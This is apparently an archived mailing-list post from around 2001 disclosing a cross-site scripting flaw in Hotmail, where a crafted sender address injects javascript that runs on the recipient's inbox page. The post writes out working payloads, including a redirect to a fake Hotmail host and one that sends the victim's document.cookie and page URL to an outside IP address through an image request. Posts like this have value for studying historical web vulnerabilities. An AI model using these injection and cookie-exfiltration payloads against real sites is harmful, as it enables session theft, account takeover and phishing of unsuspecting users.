You can bypass the hotmail javascript 'filtering' system using the from-address. I used netscape messenger and set my email address to "a background=javascript:alert('test') @hotmail.com" (without quotes), then netscape sends it as "user"@domain. The from-address is used by hotmail as the name of the cell for the message link etc. --> From my hotmail inbox page: <td name=""a background=javascript:alert('test') "@hotmail.com"> and javascript code is executed. And its executed on the inbox page=extra fun :) --- "a background=javascript:location.href='fake.hotmail.bla.com' @hotmail.com" "a background=javascript:document.images[1].src='http://123.12.123.2/cgi-bin/bla.cgi?'+document.cookie+location.href @hotmail.com" etc... :) grtz ObLiviON
This archive was generated by hypermail 2b30 : Mon Sep 10 2001 - 09:37:35 PDT